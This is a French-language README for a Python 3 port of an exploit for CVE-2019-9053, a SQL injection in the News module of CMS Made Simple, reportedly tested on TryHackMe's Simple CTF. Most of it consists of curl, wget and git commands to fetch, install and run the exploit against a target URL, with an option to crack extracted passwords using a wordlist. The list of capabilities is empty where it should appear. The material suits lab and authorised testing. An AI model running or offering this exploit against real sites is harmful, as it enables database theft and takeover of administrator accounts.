
CVE-2019-9053.
Il s'agit d'un portage en Python 3 de l'exploit CVE-2019-9053, qui cible CMS Made Simple (CMSMS) dans les versions antérieures à 2.2.10. La vulnérabilité permet une injection SQL via l'interface du module News.
Testé sur le TryHackMe Simple CTF Challenge.

L'exploit tire parti d'une vulnérabilité d'injection SQL dans le module News de CMS Made Simple. Il peut :
Téléchargez et exécutez rapidement avec ces commandes :
# Download the exploit
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
# Download requirements
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
# Install requirements
pip install -r requirements.txt
# Make exploit executable
chmod +x exploit.py
# Run the exploit
./exploit.py -u http://target.com/cms
Alternative avec wget :
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
pip install -r requirements.txt
chmod +x exploit.py
./exploit.py -u http://target.com/cms
git clone https://github.com/del0x3/CVE-2019-9053-port-py3.git
cd CVE-2019-9053-port-py3
pip install -r requirements.txt
Utilisation de base :
python3 exploit.py -u http://target.com/cms
Avec cassage de mot de passe :
python3 exploit.py -u http://target.com/cms -c -w /path/to/wordlist.txt
-u, --url : URL cible de base (requis)-w, --wordlist : Chemin vers la wordlist pour le cassage de mot de passe-c, --crack : Activer le mode de cassage de mot de passeCet outil est destiné uniquement à des fins éducatives et de recherche en sécurité. Ne l'utilisez pas contre des systèmes sans autorisation explicite.
Licence MIT